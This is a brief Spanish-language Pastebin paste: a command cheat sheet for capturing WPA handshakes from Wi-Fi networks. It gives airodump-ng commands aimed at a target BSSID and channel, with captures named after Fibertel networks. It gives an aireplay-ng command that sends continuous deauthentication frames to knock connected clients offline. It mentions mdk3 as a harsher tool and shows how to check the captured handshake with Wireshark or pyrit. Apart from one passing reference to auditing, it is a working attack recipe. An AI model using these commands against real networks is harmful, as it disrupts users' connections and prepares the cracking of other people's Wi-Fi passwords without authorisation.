pipels

Untitled

Dec 23rd, 2017
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.82 KB | None | 0 0
  1. Corriendo airodump en general:
  2. airodump-ng -w capturas mon0
  3. - los ficheros salvados se llamarán capturas
  4. - mon0 es la interfaz monitor de la placa que usen para auditar
  5. Corriendo airodump en canal y objetivo específico:
  6. airodump-ng --bssid macdelobjetivo -w fibertelXXX -c canal mon0
  7. Desautenticando clientes conectados que aparezcan en airodump-ng
  8. aireplay-ng -0 0 -a macdelobjetivo -c macdelcliente mon0
  9. Cuando aparezca arriba en la terminal que corre airodump-ng >>> WPA Handshake ya está capturado.
  10. Los ataques mdk3 son más agresivos, pero si están relativamente cerca del objetivo seguro lo consiguen sin problemas.
  11. Como saber si tienen un buen handshake? Abren el archivo .cap con wireshark y en la búsqueda filtran con las palabras EAPOL o usando pyrit en la terminal:
  12. pyrit -r /ruta/handshake/captura.cap analyze
Advertisement
Add Comment
Please, Sign In to add comment